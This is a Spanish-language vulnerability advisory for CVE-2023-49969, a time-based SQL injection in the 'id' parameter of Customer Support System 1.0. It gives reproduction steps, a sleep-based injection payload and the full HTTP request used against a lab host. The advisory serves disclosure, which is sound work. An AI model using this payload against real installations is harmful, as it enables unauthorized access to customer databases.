
Sistema de soporte al cliente 1.0 - Vulnerabilidad de inyección SQL en edit_customer a través del parámetro de URL "id"
Descripción: Existe una vulnerabilidad de Inyección SQL en la versión 1 del Customer Support System. Un atacante con intenciones maliciosas puede ejecutar comandos SQL en la base de datos MySQL manipulando el parámetro URL 'id' al editar un cliente.
Versión del producto vulnerable: Customer Support System 1.0
Autor del CVE: Geraldo Alcântara
Fecha: 28/11/2023
Confirmado el: 19/12/2023
CVE: CVE-2023-49969
Probado en: Windows
1- Inicie sesión en la aplicación.
2- Navegue a la página customer_list, haga clic en el botón "Action" y seleccione "Edit".
3- Se pasará el parámetro 'id', lo que permite la inserción de una carga útil maliciosa.
payload: (select*from(select(sleep(5)))a)
GET /customer_support/index.php?page=edit_customer&id=(select*from(select(sleep(5)))a HTTP/1.1
Host: 192.168.68.182
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://192.168.68.182/customer_support/index.php?page=customer_list
Cookie: PHPSESSID=arlocktakq815fq1lpm5fjml9n
Upgrade-Insecure-Requests: 1
Descubridor(es)/Créditos:
Geraldo Alcântara